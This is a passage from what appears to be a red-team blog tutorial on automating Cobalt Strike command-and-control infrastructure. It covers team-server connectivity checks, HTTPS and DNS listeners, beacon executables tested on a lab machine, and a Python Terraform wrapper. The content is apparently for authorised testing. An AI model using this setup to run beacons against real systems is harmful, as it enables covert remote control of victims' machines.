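ping -c 1 192.168.100.200     # team-server over the Nebula overlay
nc -zv 192.168.100.200 50050  # teamserver port reachable per the operator ACL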
Next, I'll start Cobalt Strike on the operator machine to connect to the team-server instance.
/opt/c2/cobaltstrike/start.sh
Here I'll set a few connection input values to establish the connection to the "Team-Server".
Once connected, I'll set up two listeners, one for HTTPS traffic and the other for DNS. For the HTTPS listener I will use the windows.pe hostname, since that is the entry point to the team server. The options I used are shown below.
With the settings pointed at the C2 HTTPS edge domain, "Save" the listener and make sure there are no errors. Next, I'll generate a Windows executable using the HTTPS listener I just created to test the beacon.
Once the Windows executable is generated, I'll move it onto a vulnerable machine so I can test the beacon.
The newly created beacon pops almost instantly without any issues! This shows the HTTPS beacon is routing through all the rules and tunnels created earlier and making its way to the team server.
Now it's time to create the DNS listener, where the options are slightly different since I'll be using the DNS server and a subdomain to route the UDP traffic directly to the team server.
Same routine as last time: "Save" the listener, then generate a Windows executable to test on the vulnerable machine, and check the results within a few minutes.
Success! Both beacons are working without errors. The automated build process effectively drops a live Cobalt Strike team server into the operator's lab, with the whole build taking roughly five minutes.
Wrapping Up with Python
With the automation complete, I'll wrap the Terraform builder and logic into a nice little Python tool that stands up and destroys the infrastructure on demand.
Before starting on this script, I need to install two Python modules that help with the logic. The two modules are pyyaml and python-terraform, which can be installed with the following commands.
pip install pyyaml
pip install python-terraform
Once the two (2) modules are installed, I will add a file named network.yaml to the src/config/ directory, which stores the Linode API key and domain as shown below.
network.yaml
linode:
  token: 920fd6f3d417600c871ff...
  domain: windows.pe
The configuration is very simple at this point, just the Linode values that were previously stored in the variables.tf file, so next I will remove the default values from variables.tf, since from now on those values will live here.
variables.tf
variable"linode_token" {description = "The Linode API Token"}variable "linode_domain" {description = "The domain to be used at Linode"}
As you can see, I removed the default values that were present during testing. Now, back in the Python project root folder, I will create a file named c2_build.py with the following contents.
c2_build.py
from python_terraform import Terraform, IsFlagged
from yaml import safe_load, YAMLError


def build(template: str, token: str, domain: str) -> dict:
    tf = Terraform(working_dir=template)
    ret, stdout, stderr = tf.apply(
        capture_output=True,
        no_color=IsFlagged,
        skip_plan=True,
        var={'linode_token': token, 'linode_domain': domain})
    if stdout:
        return tf.output()
    if stderr:
        print(stderr)
    return {}


def destroy(template: str, token: str, domain: str) -> None:
    tf = Terraform(working_dir=template)
    ret, stdout, stderr = tf.destroy(
        capture_output=True,
        auto_approve=True,
        force=None,
        var={'linode_token': token, 'linode_domain': domain})
    if stdout:
        print("[*] C2 Build destruction complete!\n")
    if stderr:
        print(stderr)


if __name__ == "__main__":
    import os

    _token: str = ""
    _domain: str = ""
    _template: str = "src/templates"

    if os.name == 'nt':
        print("[!] This tool requires the Linux operating system. Exiting.\n")
        exit(1)

    print("[*] Pulling configuration from src/config/network.yaml")
    try:
        with open('src/config/network.yaml', 'r') as file:
            data = safe_load(file)
            _token = data['linode']['token']
            _domain = data['linode']['domain']
    except (OSError, YAMLError):
        print("[!] Error parsing the YAML configuration file.\n")
        exit(1)

    print("[*] Building network...")
    output: dict = build(_template, _token, _domain)
    print("[*] Output from build...")
    for x in output:
        print(f"Instance {x} has IP {output[x]['value']}")

    input("\nPress any key to destroy build...")
    print("[*] Destroying network...")
    destroy(_template, _token, _domain)
This is a simple PoC script meant to demonstrate how a complex Terraform build can be moved into Python for a higher level of customization. The tool I'm currently building uses far more Python to give operators additional functionality, but the build here is meant to show how quickly you can create your own custom C2 infrastructure.
Here is the script in action.
With a single command, operators can now have a fully functional C2 running their favorite framework, with a total build time of roughly five minutes, including DNS and HTTPS with SSL.
And with that, I'm done. The official version of the "Red Nebula" tool is currently in development and should be finished in a month or so.